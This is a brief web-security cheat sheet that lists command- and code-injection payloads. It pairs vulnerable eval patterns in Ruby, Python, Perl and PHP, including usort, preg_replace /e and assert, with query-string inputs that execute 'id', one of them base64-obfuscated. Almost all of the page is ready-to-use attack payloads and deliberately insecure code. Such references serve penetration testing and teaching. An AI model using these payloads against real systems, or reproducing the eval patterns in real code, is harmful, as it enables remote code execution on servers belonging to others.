Execute Commands
Command Execution
;id
`id`
$(id)Ruby Code Execution
eval "\""+params['1']+"\""
?1="%2b`id`%2b"Python Code Execution
eval('"'+1+'"')
"%2bos.system('id')%2b"
"%2bos.popen('id').read()%2b"
"%2b__import__('os').popen('id').read()%2b"
"%2b__import__('os').popen(__import__('base64').b64decode('aWQ=')).read()%2b"Perl Code Execution
eval("return '".$FORM{1}."'");
/cgi-bin/form?1='.`id`.'PHP Code Execution
$s="echo \"".$_GET['1']."\";";
eval($s);
?1=".system('id')."usort()
$1 = $_GET["1"];
usort(function('$a, $b', 'return strcmp($a->'.$1.',$b->'.$1.');'));
?1=id);}system('id');//preg_replace()
preg_replace($_GET["1"], $_GET["2"], $_GET["3"]);
?1=/x/e&2=system('id')&3=xassert()
assert(trim("'".$_GET['1']."'"));
echo htmlentities($_GET['1']);
?1=hacker'.system('id').'Last updated
Was this helpful?